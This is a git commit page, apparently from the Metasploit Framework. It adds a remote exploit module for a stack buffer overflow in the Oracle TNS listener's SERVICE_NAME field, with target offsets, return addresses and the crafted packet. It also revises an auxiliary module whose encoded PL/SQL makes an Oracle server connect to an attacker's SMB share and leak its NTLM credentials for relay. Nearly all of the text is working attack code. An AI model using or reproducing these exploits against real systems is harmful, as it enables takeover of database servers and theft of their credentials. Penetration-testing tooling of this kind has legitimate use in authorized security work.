added exploit module tns_service_name.rb. updated ora_ntlm_stealer.rb to use the new mixin.
git-svn-id: file:///home/svn/framework3/trunk@6804 4d416f70-5f16-0410-b530-b9f4589650daunstable
Mario Ceballos
parent
6624dbd5ff
commit
6005ac7c3f
|
|
@ -1,80 +1,82 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Owning Windows server using Oracle database unpivileged user',
|
||||
'Description' => %q{
|
||||
This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges)
|
||||
To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to
|
||||
Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'April 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
|
||||
prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
|
||||
prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
|
||||
|
||||
exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
|
||||
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
prp1 = Rex::Text.encode_base64(prepare1)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
#{rand1} VARCHAR2(32767);
|
||||
#{rand2} VARCHAR2(32767);
|
||||
#{rand3} VARCHAR2(32767);
|
||||
BEGIN
|
||||
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
|
||||
EXECUTE IMMEDIATE #{rand1};
|
||||
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
|
||||
EXECUTE IMMEDIATE #{rand2};
|
||||
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
|
||||
EXECUTE IMMEDIATE #{rand3};
|
||||
END;
|
||||
/
|
||||
|
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sql)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Owning Windows server using Oracle database unpivileged user.',
|
||||
'Description' => %q{
|
||||
This module will help you to get Administrator access to OS using unprivileged
|
||||
Oracle database user (you need only CONNECT and RESOURCE privileges)
|
||||
To do this you must firstly run smb_sniffer of smb_relay module on your sever.
|
||||
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
|
||||
which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working you will get Administrators access to server which runs
|
||||
Oracle of not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
|
||||
prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
|
||||
prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
|
||||
|
||||
exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
|
||||
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
prp1 = Rex::Text.encode_base64(prepare1)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
#{rand1} VARCHAR2(32767);
|
||||
#{rand2} VARCHAR2(32767);
|
||||
#{rand3} VARCHAR2(32767);
|
||||
BEGIN
|
||||
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
|
||||
EXECUTE IMMEDIATE #{rand1};
|
||||
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
|
||||
EXECUTE IMMEDIATE #{rand2};
|
||||
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
|
||||
EXECUTE IMMEDIATE #{rand3};
|
||||
END;
|
||||
|
|
||||
|
||||
begin
|
||||
print_status("Executing #{self.name}...")
|
||||
prepare_exec(sql)
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -0,0 +1,95 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::TNS
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Oracle. When
|
||||
sending a specially crafted packet containing a long SERVICE_NAME
|
||||
to the TNS service, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '4845'],
|
||||
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
|
||||
[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 600,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
|
||||
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)', { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'May 27 2002'))
|
||||
|
||||
register_options([Opt::RPORT(1521)], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
|
||||
version = "(CONNECT_DATA=(COMMAND=VERSION))"
|
||||
|
||||
pkt = tns_packet(version)
|
||||
|
||||
sock.put(pkt)
|
||||
|
||||
sock.get_once
|
||||
|
||||
res = sock.get_once(-1, 1)
|
||||
|
||||
disconnect
|
||||
|
||||
if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
|
||||
buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
|
||||
buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)
|
||||
|
||||
sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"
|
||||
|
||||
pkt = tns_packet(sploit)
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
sock.put(pkt)
|
||||
|
||||
handler
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
Loading…
Reference in New Issue